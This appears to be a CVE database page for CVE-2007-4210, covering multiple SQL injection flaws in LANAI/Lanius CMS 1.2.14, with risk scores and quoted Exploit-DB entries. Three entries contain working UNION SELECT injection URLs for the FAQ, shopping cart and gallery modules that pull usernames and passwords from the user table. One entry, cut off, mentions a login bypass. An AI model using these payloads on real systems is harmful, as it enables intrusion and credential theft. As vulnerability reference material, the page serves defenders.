CVE-2007-4210
published 2007-08-08CVE-2007-4210: Multiple SQL injection vulnerabilities in module.php in LANAI (la-nai) CMS 1.2.14 allow remote attackers to execute arbitrary SQL commands via (1) the mid…
PriorityP344high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.94%
85.4th percentile
Multiple SQL injection vulnerabilities in module.php in LANAI (la-nai) CMS 1.2.14 allow remote attackers to execute arbitrary SQL commands via (1) the mid parameter in an faqviewgroup action in the FAQ Modules, (2) the cid parameter in the EZSHOPINGCART Modules, or (3) the gid parameter in a view action in the GALLERY Modules.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| redline_software | lanai_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Lanius CMS 1.2.14 - Multiple SQL Injections
exploitdb·2007-08-06
CVE-2007-4210 Lanius CMS 1.2.14 - Multiple SQL Injections
Lanius CMS 1.2.14 - Multiple SQL Injections
---
#######################################################################
########### newhack[dot]org ############
########################################################################
# la-nai cms_v1.2.14 - Remote SQL Injection
# Vendor : http://www.redlinesoft.net/module.php?modname=content&cid=9
# Download : http://sourceforge.net/project/showfiles.php?group_id=191629
# Found By : k1tk4t - k1tk4t[4t]newhack.org [ http://newhack.org ]
# Location : Indonesia
########################################################################
bug terdapat pada la-nai module
tested modules
-faq
-gallery
-ezshopingcart
dan kemungkinan terdapat pada module lainnya,
pada login site halaman depan, authentikasi login dapat di bypass
dengan menggunakan usern
Exploit-DB
Lanius CMS 1.2.14 FAQ Module - 'mid' SQL Injection
exploitdb·2007-08-03
CVE-2007-4210 Lanius CMS 1.2.14 FAQ Module - 'mid' SQL Injection
Lanius CMS 1.2.14 FAQ Module - 'mid' SQL Injection
---
source: https://www.securityfocus.com/bid/25193/info
LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.
http://www.example.com/module.php?modname=faq&mf=faqviewgroup&mid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,userLogin,userPassword,5,6,7/**/FROM/**/tbl_ln_user/*
Exploit-DB
Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injection
exploitdb·2007-08-03
CVE-2007-4210 Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injection
Lanius CMS 1.2.14 EZSHOPINGCART Module - 'cid' SQL Injection
---
source: https://www.securityfocus.com/bid/25193/info
LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.
http://www.example.com/module.php?modname=ezshopingcart&ac=c&cid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,concat(userLogin,'-',userPassword),4,5/**/FROM/**/tbl_ln_user/*
Exploit-DB
Lanius CMS 1.2.14 GALLERY Module - 'gid' SQL Injection
exploitdb·2007-08-03
CVE-2007-4210 Lanius CMS 1.2.14 GALLERY Module - 'gid' SQL Injection
Lanius CMS 1.2.14 GALLERY Module - 'gid' SQL Injection
---
source: https://www.securityfocus.com/bid/25193/info
LANAI CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
LANAI CMS 1.2.14 is vulnerable; other versions may also be affected.
http://www.example.com/module.php?modname=gallery&mf=view&gid=1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,userLogin,userPassword,4/**/FROM/**/tbl_ln_user/*
No writeups or analysis indexed.
http://osvdb.org/36438http://osvdb.org/37470http://osvdb.org/37471http://secunia.com/advisories/26339http://securityreason.com/securityalert/2975http://www.securityfocus.com/archive/1/475447http://www.securityfocus.com/bid/25193https://exchange.xforce.ibmcloud.com/vulnerabilities/35786http://osvdb.org/36438http://osvdb.org/37470http://osvdb.org/37471http://secunia.com/advisories/26339http://securityreason.com/securityalert/2975http://www.securityfocus.com/archive/1/475447http://www.securityfocus.com/bid/25193https://exchange.xforce.ibmcloud.com/vulnerabilities/35786
2007-08-08
Published